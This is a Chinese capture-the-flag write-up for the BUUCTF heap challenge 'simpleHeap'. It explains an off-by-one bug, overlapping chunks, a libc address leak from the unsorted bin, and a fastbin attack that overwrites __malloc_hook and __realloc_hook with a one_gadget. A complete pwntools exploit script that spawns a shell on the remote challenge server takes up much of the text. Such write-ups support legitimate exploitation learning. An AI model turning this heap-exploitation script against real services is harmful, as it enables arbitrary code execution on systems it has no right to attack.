[V&N2020 公开赛]simpleHeap

附件

步骤:

  1. 例行检查,64位,保护全开
  2. 根据题目可知是一道堆,直接用64位ida打开

    我修改了这些函数的名称,这样方便看程序
  3. add,我们可以申请一个0~111大小的堆块,note_list里存放的是chunk的指针,size_list里存放的是chunk的size

    edit

    edit_1,可以看到当i在出了第6行的if循环的时候,它的值是a2+1,这样导致存在off by one漏洞,应该将判断条件改写成>=10

    show,根据传入的idx,去寻找对应的指针,输出对应的内容

    delete,根据传入的idx,释放掉指针所指向的内存,并将指针置为0,size置0
  4. 首先创建三个chuk,第一个的size为0x18(24),因为系统在分配内存时,chunk 的大小必须是 2 * SIZE_SZ 的整数倍。如果申请的内存大小不是 2 * SIZE_SZ的整数倍,会被转换满足大小的最小的 2 *SIZE_SZ 的倍数,64 位系统中,SIZE_SZ 是 8,而且处于使用状态中的chunk会复用下一个chunk的pre_size区域
add(0x18,'a'*0x18)
add(0x18,'b'*0x18)
add(0x18,'c'*0x18) gdb.attach(r)


  1. 根据上面从IDA反编译出的函数的分析,edit函数存在off by one漏洞
    修改chunk0的时候,可以覆盖chunk1的size,这里我们将chunk1的size改为0x41,然后将其释放
edit(0,'a'*0x18+p8(0x41))
delete(1)

可以看到chunk1的大小以及被我们修改了

我们再申请0x30大小的chunk,就可以使chunk1和chunk2有重叠的部分

我们可以通过修改chunk1的内容来修改chunk2的size字段为0x91

这样系统再free的时候,将chunk2释放到unsorted bin(堆管理器的垃圾桶)里面,当unsorted bin里只有一个chunk时,该chunk的fd和bk指针均指向unsorted bin本身,而unsorted bin本身的地址与libc的基址之间的偏移是固定的,所以我们可以借此来泄露libc 基址。

先修改一下chunk2的size

edit(1,'e'*0x18+p64(0x91))


glibc在定位一个chunk的net_chunk时,是使用当前chunk_addr+当前chunk_size来实现的。chunk2的大小为0x20(包含chunk header),上图可以看到chunk2后的next_chunk的地址应该是0x40+0x90=0xd0,上图的0xd0地址处没有值,所以需要下处add来伪造chunk2的next chunk的pre_size域,可以通过释放的时候的检查。

add(0x60,'f'*0x60)


先malloc chunk便于后面payload构造,这里先申请了chunk4,用上面的办法,通过修改chunk4来修改chunk5的的size为0x41

add(0x18,"A"*0x10)
add(0x18,'a'*0x10)
edit(4,'b'*0x18+p8(0x41))


然后申请chunk6和chunk7,这里构造chunk6的内容,与上面是一样的目的,为了使通过释放chunk5时的安全检查。然后释放chunk5,再次申请chunk5,使chunk5与chunk6的部分内存空间重叠,因为后面chunk6会被释放,所以无法通过修改chunk6来修改chunk6的fd指针,所以需要通过修改chunk5来修改chunk6的fd指针。这里malloc chunk8是为了在释放chunk7的时候不与top chunk合并。

add(0x60,'b'*0x10+p64(0x40)+p64(0x21))	#chunk 6
add(0x60,'c'*0x10) #chunk 7
add(0x10,'c'*0x10) #chunk 8

delete(5)
add(0x30,'a'*0x18) #chunk 5


将chunk2释放,使其被放入unsorted bin,以此来泄露libc。这里因为chunk2的pre_size区域有00字段,导致在调用show函数的时候,puts函数会造成截断无法输出unsorted bin的地址,尝试使用edit函数来修改chunk2的pre_size区域,但是edit函数会将回车替换成00,所以我们这里先释放chunk1,然后再申请,add函数在输入内容的时候不会把回车修改为00字符。

delete(2)
delete(1)
add(0x30,'e'*0x20) #1
show(1) libc_base=u64(r.recv(0x26)[0x20:].ljust(8,"\x00"))-0x3c4b78
log.success("libc_base:"+hex(libc_base))
one_daget_offset=[0x45216,0x4526a,0xf02a4,0xf1147]
one_daget=libc_base+one_daget_offset[1]

libc_base的接收

先释放chunk7,再释放chunk6,使fast bin 链表结构为chunk6->fd=chunk7 ,修改chunk5来修改chunk6的fd指针为fake_chunk的指针。然后,先malloc 0x60得到chunk7,再次malloc 0x60,系统会认为chunk6–>fd指向的地址为空闲的chunk,便会将fake_chunk指向内存空间返还给我们,同时将payload写入

delete(7)
delete(6)
edit(5,'f'*0x18+p64(0x71)+p64(libc_base+0x3c4aed))
add(0x60,'B'*0x10)
payload = p8(0)*11
payload += p64(one_daget)
payload+= p64(libc_base+0x846C0+0xc)
add(0x60,payload)

该payload修改__realloc_hook地址处的内容为one gadget地址,
我将libc里的one_gadget都试了一下,发现不对

去网上翻看了一下其他师傅的wp,发现他们修改了malloc_hook地址处的内容为ralloc函数的地址+0xc,来满足使用one_gadget的条件限制
参考这个师傅的方法,malloc_hook与realloc_hook是相邻的,所以这里可以通过一次修改达到目的。
realloc函数偏移为0x846c0,可以看到前面有很多push操作,通过修改realloc函数的起始地址+offset ,来减少或增加push的此时,来修正[rsp+0x30]为NUL,我们这里offset使用的为0xc,可以达到目的

完成上述的布局后只要去新建一个chunk就能触发漏洞利用

调用malloc函数---->判断是否有malloc_hook,有则调用之---->我们这里malloc_hook设置的为realloc函数+offset,程序便到此处执行---->执行realloc函数时,会判断是否有realloc_hook,有则调用之---->我们这里realloc_hook设置的为one_gadget,所以便会转到one_gadget处执行。

完整exp

#coding=utf-8
from pwn import * #r=process('./vn_pwn_simpleHeap')
r=remote("node3.buuoj.cn",28763) #context.log_level='debug' libc=ELF("./libc-2.23-64.so") def add(size,content):
r.recvuntil("choice: ")
r.sendline(str(1))
r.recvuntil("size?")
r.sendline(str(size))
r.recvuntil("content:")
r.send(content) def edit(idx,content):
r.recvuntil("choice: ")
r.sendline(str(2))
r.recvuntil("idx?")
r.sendline(str(idx))
r.recvuntil("content:")
r.sendline(content)
r.recvuntil("Done!") def show(idx):
r.recvuntil("choice: ")
r.sendline(str(3))
r.recvuntil("idx?")
r.sendline(str(idx)) def delete(idx):
r.recvuntil("choice: ")
r.sendline(str(4))
r.recvuntil("idx?")
r.sendline(str(idx))
r.recvuntil("Done!") add(0x18,'a'*0x18)
add(0x18,'b'*0x18)
add(0x18,'c'*0x18) edit(0,'a'*0x18+p8(0x41))
delete(1)
add(0x30,'d'*0x30) edit(1,'e'*0x18+p64(0x91)) add(0x60,'f'*0x60) add(0x18,"A"*0x10)
add(0x10,'a'*0x10)
edit(4,'b'*0x18+p8(0x41)) add(0x60,'b'*0x10+p64(0x40)+p64(0x21)) #6
add(0x60,'c'*0x10) #7
add(0x10,'c'*0x10) #8
delete(5)
add(0x30,'a'*0x18) #5 delete(2)
delete(1)
add(0x30,'e'*0x20) #1
show(1) libc_base=u64(r.recv(38)[32:].ljust(8,"\x00"))-0x3c4b78
log.success("libc_base:"+hex(libc_base))
one_daget_offset=[0x45216,0x4526a,0xf02a4,0xf1147]
one_daget=libc_base+one_daget_offset[1] delete(7)
delete(6) #fast bin chunk6>chunk
edit(5,'f'*0x18+p64(0x71)+p64(libc_base+0x3c4aed))
add(0x60,'B'*0x10)#get idx7
payload = p8(0)*11
payload += p64(one_daget) #realloc_hook 写入one daget
payload+= p64(libc_base+0x846C0+0xc)#malloc hook 写入
add(0x60,payload)#get idx8 malloc_hook chunk r.recvuntil("choice: ")
r.sendline(str(1))
r.recvuntil("size?")
r.sendline(str(0x10))
r.interactive()
#gdb.attach(r) r.interactive()

参考wp:
https://www.cnblogs.com/zhwer/p/14009340.html
https://blog.csdn.net/qq_36495104/article/details/106236474
http://www.pwn4fun.com/pwn/buuctf-pwn-writeup-part4.html#%5BV_N2020%E5%85%AC%E5%BC%80%E8%B5%9B%5D_Simple_Heap

[BUUCTF]PWN——[V&N2020 公开赛]simpleHeap的更多相关文章

  1. [BUUCTF]PWN——[V&N2020 公开赛]easyTHeap

    [V&N2020 公开赛]easyTHeap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,常见的堆的菜单 64位ida载入,main函数 最多只能申请7个ch ...

  2. [BUUCTF]PWN——[V&N2020 公开赛]babybabypwn

    [V&N2020 公开赛]babybabypwn 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看程序的大概情况 64位ida载入,看一下main函数 sub_1202()函 ...

  3. [BUUCTF]PWN——[V&N2020 公开赛]warmup

    [V&N2020 公开赛]warmup 附件 步骤: 例行检查,64位程序,除了canary,其他保护都开 本地运行一下,看看大概的情况 64位ida载入,从main函数开始看程序 看到程序将 ...

  4. 【pwn】V&N2020 公开赛 simpleHeap

    [pwn]V&N2020 公开赛 simpleHeap 1.静态分析 首先libc版本是ubuntu16的2.23版本,可以去buu的资源处下载 然后checksec一下,保护全开 拖入IDA ...

  5. [BUUCTF]REVERSE——[V&N2020 公开赛]CSRe

    [V&N2020 公开赛]CSRe 附件 步骤: 例行检查,无壳儿,但是有NET混淆,使用de4dot工具进行处理 之后用dnSpy打开,从入口点开始看程序 找到有关flag的信息 flag由 ...

  6. [BUUCTF]REVERSE——[V&N2020 公开赛]strangeCpp

    [V&N2020 公开赛]strangeCpp 附加 步骤 查壳,无壳,64位程序 64位ida载入,没有main函数,根据程序里的字符串,去查看函数 __int64 __fastcall s ...

  7. 刷题记录:[V&N2020 公开赛]TimeTravel

    题目复现链接:https://buuoj.cn/challenges 参考链接:2020 年 V&N 内部考核赛 WriteUp V&N公开赛2020 writeup httpoxy ...

  8. [V&N2020 公开赛] Web misc部分题解

    0x00 前言 写了一天题目,学到了好多东西, 简单记录一下 0x01 Web HappyCTFd 直接使用网上公开的cve打: 解题思路:先注册一个admin空格账号,注意这里的靶机无法访问外网,邮 ...

  9. [V&N2020 公开赛]babybabypwn

    写在开头,感谢"影二つ"师傅的指点. 题目的做法思路网上一搜一大把,这篇博客主要记录一下这道题用pwntools写srop的时候,为什么需要省略前面8个字节. 在看题目之前,先来学 ...

随机推荐

  1. [atARC121F]Logical Operations on Tree

    (特判$n=1$的情况) 当确定权值和操作后,如何判定是否合法-- 考虑一个度为1的节点,对其权值即其对应边的边操作分类讨论: $1\or$,显然只需要最后选择这条边即可,一定合法 $1\and$或$ ...

  2. [atARC094F]Normalization

    考虑$s$能变成$t$的必要条件(假设$s\ne t$): 1.$s$中存在一对相邻字符不同 2.$|s|=|t|$且若将a-c对应为0-2,则字符模3同余: 3.$t$中存在一对相邻两个字符相同 同 ...

  3. [bzoj1005]明明的烦恼

    根据purfer序列的原理,每一个purfer序列都一一对应了一棵树,每一个点在purfer序列中出现的次数就是它的度数,那么直接用组合数去计算即可,注意要加高精度 1 #include<cst ...

  4. CF1036F

    考虑这种一堆数字\(gcd = k\) 有经典做法. 考虑设\(f(x)\)为\(gcd\)是\(x\)的倍数的方案数. \(g(x)\)为\(gcd\)刚好为\(x\)的方案数. 则有 \(f(x) ...

  5. Codeforces 1491G - Switch and Flip(构造题)

    Codeforces 题目传送门 & 洛谷题目传送门 obviously,难度高一点的构造题对我来说都是不可做题 首先考虑将排列拆成一个个置换环,也就是 \(\forall i\) 连边 \( ...

  6. 【豆科基因组】绿豆Mungbean, Vigna radiata基因组2014NC

    目录 来源 一.简介 二.结果 基因组组装 重复序列和转座子 基因组特征和基因注释 绿豆的驯化 豆科基因组复制历史 基于转录组分析的豇豆属形成 绿豆育种基因组资源 三.讨论 四.方法 材料 组装 SN ...

  7. python-django-常用models里面的Field

    1.models.AutoField 自增列 = int(11) 如果没有的话,默认会生成一个名称为 id 的列 如果要显式的自定义一个自增列,必须设置primary_key=True. 2.mode ...

  8. 【2】蛋白鉴定软件之Comet

    目录 1.简介 2.下载安装 3.软件使用 4.结果 1.简介 官网:http://comet-ms.sourceforge.net/ 1993年开发,持续更新,免费开源 适用Windows/Linu ...

  9. dlang 字符串char[] 和string

    各个情况下数据类型异同 1 import std.stdio; 2 import std.string; 3 4 void main(){ 5 6 auto a="auto_a"; ...

  10. A Child's History of England.5

    Above all, it was in the Roman time, and by means of Roman ships, that the Christian Religion was fi ...